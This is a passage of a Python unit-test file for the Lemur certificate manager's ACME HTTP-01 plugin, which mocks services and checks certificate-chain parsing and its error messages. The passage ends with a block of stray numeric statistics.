        mock_destination.label = "mock-sftp-destination"
        mock_destination.plugin_name = "SFTPDestinationPlugin"
        mock_destination_service.get.return_value = mock_destination
        mock_destination_plugin = Mock()
        mock_destination_plugin.upload_acme_token.return_value = True
        mock_plugin_manager_get.return_value = mock_destination_plugin
        issuer_options = {
            "authority": mock_authority,
            "tokenDestination": "mock-sftp-destination",
            "common_name": "test.netflix.net",
        }
        csr = "123"
        mock_request_certificate.return_value = ("pem_certificate", "chain")
        pem_certificate, pem_certificate_chain, _ = provider.create_certificate(csr, issuer_options)
        # The first PEM block of fullchain_pem becomes the leaf certificate...
        self.assertEqual(pem_certificate, "-----BEGIN CERTIFICATE-----\nMIIEqzCCApOgAwIBAgIRAIvhKg5ZRO08VGQx8JdhT+UwDQYJKoZIhvcNAQELBQAw\nGjEYMBYGA1UEAwwPRmFrZSBMRSBSb290IFgxMB4XDTE2MDUyMzIyMDc1OVoXDTM2\nMDUyMzIyMDc1OVowIjEgMB4GA1UEAwwXRmFrZSBMRSBJbnRlcm1lZGlhdGUgWDEw\nggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtWKySDn7rWZc5ggjz3ZB0\n8jO4xti3uzINfD5sQ7Lj7hzetUT+wQob+iXSZkhnvx+IvdbXF5/yt8aWPpUKnPym\noLxsYiI5gQBLxNDzIec0OIaflWqAr29m7J8+NNtApEN8nZFnf3bhehZW7AxmS1m0\nZnSsdHw0Fw+bgixPg2MQ9k9oefFeqa+7Kqdlz5bbrUYV2volxhDFtnI4Mh8BiWCN\nxDH1Hizq+GKCcHsinDZWurCqder/afJBnQs+SBSL6MVApHt+d35zjBD92fO2Je56\ndhMfzCgOKXeJ340WhW3TjD1zqLZXeaCyUNRnfOmWZV8nEhtHOFbUCU7r/KkjMZO9\nAgMBAAGjgeMwgeAwDgYDVR0PAQH/BAQDAgGGMBIGA1UdEwEB/wQIMAYBAf8CAQAw\nHQYDVR0OBBYEFMDMA0a5WCDMXHJw8+EuyyCm9Wg6MHoGCCsGAQUFBwEBBG4wbDA0\nBggrBgEFBQcwAYYoaHR0cDovL29jc3Auc3RnLXJvb3QteDEubGV0c2VuY3J5cHQu\nb3JnLzA0BggrBgEFBQcwAoYoaHR0cDovL2NlcnQuc3RnLXJvb3QteDEubGV0c2Vu\nY3J5cHQub3JnLzAfBgNVHSMEGDAWgBTBJnSkikSg5vogKNhcI5pFiBh54DANBgkq\nhkiG9w0BAQsFAAOCAgEABYSu4Il+fI0MYU42OTmEj+1HqQ5DvyAeyCA6sGuZdwjF\nUGeVOv3NnLyfofuUOjEbY5irFCDtnv+0ckukUZN9lz4Q2YjWGUpW4TTu3ieTsaC9\nAFvCSgNHJyWSVtWvB5XDxsqawl1KzHzzwr132bF2rtGtazSqVqK9E07sGHMCf+zp\nDQVDVVGtqZPHwX3KqUtefE621b8RI6VCl4oD30Olf8pjuzG4JKBFRFclzLRjo/h7\nIkkfjZ8wDa7faOjVXx6n+eUQ29cIMCzr8/rNWHS9pYGGQKJiY2xmVC9h12H99Xyf\nzWE9vb5zKP3MVG6neX1hSdo7PEAb9fqRhHkqVsqUvJlIRmvXvVKTwNCP3eCjRCCI\nPTAvjV+4ni786iXwwFYNz8l3PmPLCyQXWGohnJ8iBm+5nk7O2ynaPVW0U2W+pt2w\nSVuvdDM5zGv2f9ltNWUiYZHJ1mmO97jSY/6YfdOUH66iRtQtDkHBRdkNBsMbD+Em\n2TgBldtHNSJBfB3pm9FblgOcJ0FSWcUDWJ7vO0+NTXlgrRofRT6pVywzxVo6dND0\nWzYlTWeUVsO40xJqhgUQRER9YLOLxJ0O6C8i0xFxAMKOtSdodMB3RIwt7RFQ0uyt\nn5Z5MqkYhlMI3J1tPRTp1nEt9fyGspBOO05gi148Qasp+3N+svqKomoQglNoAxU=\n-----END CERTIFICATE-----\n")
        # ...and the remaining blocks become the chain.
        self.assertEqual(pem_certificate_chain, """-----BEGIN CERTIFICATE-----
MIIEqzCCApOgAwIBAgIRAIvhKg5ZRO08VGQx8JdhT+UwDQYJKoZIhvcNAQELBQAw
GjEYMBYGA1UEAwwPRmFrZSBMRSBSb290IFgxMB4XDTE2MDUyMzIyMDc1OVoXDTM2
MDUyMzIyMDc1OVowIjEgMB4GA1UEAwwXRmFrZSBMRSBJbnRlcm1lZGlhdGUgWDEw
ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtWKySDn7rWZc5ggjz3ZB0
8jO4xti3uzINfD5sQ7Lj7hzetUT+wQob+iXSZkhnvx+IvdbXF5/yt8aWPpUKnPym
oLxsYiI5gQBLxNDzIec0OIaflWqAr29m7J8+NNtApEN8nZFnf3bhehZW7AxmS1m0
ZnSsdHw0Fw+bgixPg2MQ9k9oefFeqa+7Kqdlz5bbrUYV2volxhDFtnI4Mh8BiWCN
xDH1Hizq+GKCcHsinDZWurCqder/afJBnQs+SBSL6MVApHt+d35zjBD92fO2Je56
dhMfzCgOKXeJ340WhW3TjD1zqLZXeaCyUNRnfOmWZV8nEhtHOFbUCU7r/KkjMZO9
AgMBAAGjgeMwgeAwDgYDVR0PAQH/BAQDAgGGMBIGA1UdEwEB/wQIMAYBAf8CAQAw
HQYDVR0OBBYEFMDMA0a5WCDMXHJw8+EuyyCm9Wg6MHoGCCsGAQUFBwEBBG4wbDA0
BggrBgEFBQcwAYYoaHR0cDovL29jc3Auc3RnLXJvb3QteDEubGV0c2VuY3J5cHQu
b3JnLzA0BggrBgEFBQcwAoYoaHR0cDovL2NlcnQuc3RnLXJvb3QteDEubGV0c2Vu
Y3J5cHQub3JnLzAfBgNVHSMEGDAWgBTBJnSkikSg5vogKNhcI5pFiBh54DANBgkq
hkiG9w0BAQsFAAOCAgEABYSu4Il+fI0MYU42OTmEj+1HqQ5DvyAeyCA6sGuZdwjF
UGeVOv3NnLyfofuUOjEbY5irFCDtnv+0ckukUZN9lz4Q2YjWGUpW4TTu3ieTsaC9
AFvCSgNHJyWSVtWvB5XDxsqawl1KzHzzwr132bF2rtGtazSqVqK9E07sGHMCf+zp
DQVDVVGtqZPHwX3KqUtefE621b8RI6VCl4oD30Olf8pjuzG4JKBFRFclzLRjo/h7
IkkfjZ8wDa7faOjVXx6n+eUQ29cIMCzr8/rNWHS9pYGGQKJiY2xmVC9h12H99Xyf
zWE9vb5zKP3MVG6neX1hSdo7PEAb9fqRhHkqVsqUvJlIRmvXvVKTwNCP3eCjRCCI
PTAvjV+4ni786iXwwFYNz8l3PmPLCyQXWGohnJ8iBm+5nk7O2ynaPVW0U2W+pt2w
SVuvdDM5zGv2f9ltNWUiYZHJ1mmO97jSY/6YfdOUH66iRtQtDkHBRdkNBsMbD+Em
2TgBldtHNSJBfB3pm9FblgOcJ0FSWcUDWJ7vO0+NTXlgrRofRT6pVywzxVo6dND0
WzYlTWeUVsO40xJqhgUQRER9YLOLxJ0O6C8i0xFxAMKOtSdodMB3RIwt7RFQ0uyt
n5Z5MqkYhlMI3J1tPRTp1nEt9fyGspBOO05gi148Qasp+3N+svqKomoQglNoAxU=
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIFATCCAumgAwIBAgIRAKc9ZKBASymy5TLOEp57N98wDQYJKoZIhvcNAQELBQAw
GjEYMBYGA1UEAwwPRmFrZSBMRSBSb290IFgxMB4XDTE2MDMyMzIyNTM0NloXDTM2
MDMyMzIyNTM0NlowGjEYMBYGA1UEAwwPRmFrZSBMRSBSb290IFgxMIICIjANBgkq
hkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA+pYHvQw5iU3v2b3iNuYNKYgsWD6KU7aJ
diddtZQxSWYzUI3U0I1UsRPTxnhTifs/M9NW4ZlV13ZfB7APwC8oqKOIiwo7IwlP
xg0VKgyz+kT8RJfYr66PPIYP0fpTeu42LpMJ+CKo9sbpgVNDZN2z/qiXrRNX/VtG
TkPV7a44fZ5bHHVruAxvDnylpQxJobtCBWlJSsbIRGFHMc2z88eUz9NmIOWUKGGj
EmP76x8OfRHpIpuxRSCjn0+i9+hR2siIOpcMOGd+40uVJxbRRP5ZXnUFa2fF5FWd
O0u0RPI8HON0ovhrwPJY+4eWKkQzyC611oLPYGQ4EbifRsTsCxUZqyUuStGyp8oa
aoSKfF6X0+KzGgwwnrjRTUpIl19A92KR0Noo6h622OX+4sZiO/JQdkuX5w/HupK0
A0M0WSMCvU6GOhjGotmh2VTEJwHHY4+TUk0iQYRtv1crONklyZoAQPD76hCrC8Cr
IbgsZLfTMC8TWUoMbyUDgvgYkHKMoPm0VGVVuwpRKJxv7+2wXO+pivrrUl2Q9fPe
Kk055nJLMV9yPUdig8othUKrRfSxli946AEV1eEOhxddfEwBE3Lt2xn0hhiIedbb
Ftf/5kEWFZkXyUmMJK8Ra76Kus2ABueUVEcZ48hrRr1Hf1N9n59VbTUaXgeiZA50
qXf2bymE6F8CAwEAAaNCMEAwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMB
Af8wHQYDVR0OBBYEFMEmdKSKRKDm+iAo2FwjmkWIGHngMA0GCSqGSIb3DQEBCwUA
A4ICAQBCPw74M9X/Xx04K1VAES3ypgQYH5bf9FXVDrwhRFSVckria/7dMzoF5wln
uq9NGsjkkkDg17AohcQdr8alH4LvPdxpKr3BjpvEcmbqF8xH+MbbeUEnmbSfLI8H
sefuhXF9AF/9iYvpVNC8FmJ0OhiVv13VgMQw0CRKkbtjZBf8xaEhq/YqxWVsgOjm
dm5CAQ2X0aX7502x8wYRgMnZhA5goC1zVWBVAi8yhhmlhhoDUfg17cXkmaJC5pDd
oenZ9NVhW8eDb03MFCrWNvIh89DDeCGWuWfDltDq0n3owyL0IeSn7RfpSclpxVmV
/53jkYjwIgxIG7Gsv0LKMbsf6QdBcTjhvfZyMIpBRkTe3zuHd2feKzY9lEkbRvRQ
zbh4Ps5YBnG6CKJPTbe2hfi3nhnw/MyEmF3zb0hzvLWNrR9XW3ibb2oL3424XOwc
VjrTSCLzO9Rv6s5wi03qoWvKAQQAElqTYRHhynJ3w6wuvKYF5zcZF3MDnrVGLbh1
Q9ePRFBCiXOQ6wPLoUhrrbZ8LpFUFYDXHMtYM7P9sc9IAWoONXREJaO08zgFtMp4
8iyIYUyQAbsvx8oD2M8kRvrIRSrRJSl6L957b4AFiLIQ/GgV2curs0jje7Edx34c
idWw1VrejtwclobqNMVtG3EiPUIpJGpbMcJgbiLSmKkrvQtGng==
-----END CERTIFICATE-----
""")

    @patch("lemur.plugins.lemur_acme.plugin.AcmeHandler.setup_acme_client")
    @patch("lemur.plugins.base.manager.PluginManager.get")
    @patch("lemur.plugins.lemur_acme.challenge_types.destination_service")
    @patch("lemur.plugins.lemur_acme.plugin.AcmeHandler.request_certificate")
    @patch("lemur.plugins.lemur_acme.plugin.authorization_service")
    def test_create_certificate_missing_destination_token(
        self,
        mock_authorization_service,
        mock_request_certificate,
        mock_destination_service,
        mock_plugin_manager_get,
        mock_acme,
    ):
        """When the authority options contain no tokenDestination entry,
        create_certificate must raise with a 'No token_destination configured'
        message."""
        provider = plugin.ACMEHttpIssuerPlugin()
        mock_authority = Mock()
        # Deliberately omit the "tokenDestination" option to trigger the error.
        mock_authority.options = '[{"name": "mock_name", "value": "mock_value"}]'
        mock_order_resource = Mock()
        mock_order_resource.authorizations = [Mock()]
        mock_order_resource.authorizations[0].body.challenges = [Mock()]
        mock_order_resource.authorizations[0].body.challenges[0].chall = challenges.HTTP01(
            token=b'\x0f\x1c\xbe#od\xd1\x9c\xa6j\\\xa4\r\xed\xe5\xbf0pz\xeaxnl)\xea[i\xbc\x95\x08\x96\x1f')
        mock_client = Mock()
        mock_client.new_order.return_value = mock_order_resource
        mock_acme.return_value = (mock_client, "")
        mock_destination = Mock()
        mock_destination.label = "mock-sftp-destination"
        mock_destination.plugin_name = "SFTPDestinationPlugin"
        mock_destination_service.get_by_label.return_value = mock_destination
        mock_destination_plugin = Mock()
        mock_destination_plugin.upload_acme_token.return_value = True
        mock_plugin_manager_get.return_value = mock_destination_plugin
        issuer_options = {
            "authority": mock_authority,
            "tokenDestination": "mock-sftp-destination",
            "common_name": "test.netflix.net",
        }
        csr = "123"
        mock_request_certificate.return_value = ("pem_certificate", "chain")
        with self.assertRaisesRegex(Exception, "No token_destination configured"):
            provider.create_certificate(csr, issuer_options)

    @patch("lemur.plugins.lemur_acme.plugin.AcmeHandler.setup_acme_client")
    @patch("lemur.plugins.base.manager.PluginManager.get")
    @patch("lemur.plugins.lemur_acme.challenge_types.destination_service")
    @patch("lemur.plugins.lemur_acme.plugin.AcmeHandler.request_certificate")
    @patch("lemur.plugins.lemur_acme.plugin.authorization_service")
    def test_create_certificate_missing_http_challenge(
        self,
        mock_authorization_service,
        mock_request_certificate,
        mock_destination_service,
        mock_plugin_manager_get,
        mock_acme,
    ):
        """When the ACME server offers only a DNS-01 challenge, the HTTP
        plugin must raise 'HTTP-01 challenge was not offered'."""
        provider = plugin.ACMEHttpIssuerPlugin()
        mock_authority = Mock()
        mock_authority.options = '[{"name": "tokenDestination", "value": "mock-sftp-destination"}]'
        mock_order_resource = Mock()
        mock_order_resource.authorizations = [Mock()]
        mock_order_resource.authorizations[0].body.challenges = [Mock()]
        # DNS-01 instead of HTTP-01: this plugin cannot satisfy it.
        mock_order_resource.authorizations[0].body.challenges[0].chall = challenges.DNS01(
            token=b'\x0f\x1c\xbe#od\xd1\x9c\xa6j\\\xa4\r\xed\xe5\xbf0pz\xeaxnl)\xea[i\xbc\x95\x08\x96\x1f')
        mock_client = Mock()
        mock_client.new_order.return_value = mock_order_resource
        mock_acme.return_value = (mock_client, "")
        issuer_options = {
            "authority": mock_authority,
            "tokenDestination": "mock-sftp-destination",
            "common_name": "test.netflix.net",
        }
        csr = "123"
        mock_request_certificate.return_value = ("pem_certificate", "chain")
        with self.assertRaisesRegex(Exception, "HTTP-01 challenge was not offered"):
            provider.create_certificate(csr, issuer_options)
| 57.320635
| 1,751
| 0.837838
| 1,209
| 18,056
| 12.304384
| 0.232423
| 0.011293
| 0.018284
| 0.018352
| 0.81003
| 0.80566
| 0.797392
| 0.797392
| 0.797392
| 0.797392
| 0
| 0.089125
| 0.097087
| 18,056
| 314
| 1,752
| 57.503185
| 0.823345
| 0.01152
| 0
| 0.828671
| 0
| 0.013986
| 0.682376
| 0.627795
| 0
| 1
| 0
| 0
| 0.027972
| 1
| 0.020979
| false
| 0.003497
| 0.017483
| 0
| 0.041958
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.